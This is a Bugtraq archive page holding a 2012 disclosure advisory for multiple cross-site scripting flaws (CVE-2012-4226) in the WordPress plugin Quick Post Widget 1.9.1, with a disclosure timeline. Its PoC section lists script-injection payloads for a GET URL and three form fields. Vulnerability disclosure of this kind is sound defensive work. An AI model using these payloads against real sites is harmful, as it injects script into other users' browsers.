Home page logo
/

bugtraq logo Bugtraq mailing list archives

WordPress Plugin 'Quick Post Widget' 1.9.1 Multiple Cross-site scripting vulnerabilities
From: sschurtz () darksecurity de
Date: Fri, 10 Aug 2012 07:34:46 GMT

Advisory:               WordPress Plugin 'Quick Post Widget' 1.9.1 Multiple Cross-site scripting vulnerabilities
Advisory ID:            SSCHADV2012-016
Author:                 Stefan Schurtz
Affected Software:      Successfully tested on Quick Post Widget 1.9.1
Vendor URL:             http://qpw.famvanakkeren.nl/
Vendor Status:          informed
CVE-ID:                 CVE-2012-4226

==========================
Vulnerability Description
==========================

The WordPress plugin Quick Post Widget 1.9.1 is prone to multiple XSS vulnerabilities

==================
PoC-Exploit
==================

// GET
http://[target]/wordpress/?";></script><script>alert(/xss/)</script>

// POST 
http://[target]/wordpress/ -> Quickpost 'Title' -> "></script><script>alert(/xss/)</script>
http://[target]/wordpress/ -> Quickpost 'Content' -> "></script><script>alert(/xss/)</script>
http://[target]/wordpress/ -> Quickpost 'New category' -> "></script><script>alert(/xss/)</script>

=========
Solution
=========

-

====================
Disclosure Timeline
====================

02-Jul-2012 - developer informed
09-Jul-2012 - developer feedback
10-Aug-2012 - post on BugTraq

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-016.txt


  By Date           By Thread  

Current thread:
  • WordPress Plugin 'Quick Post Widget' 1.9.1 Multiple Cross-site scripting vulnerabilities sschurtz (Aug 10)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]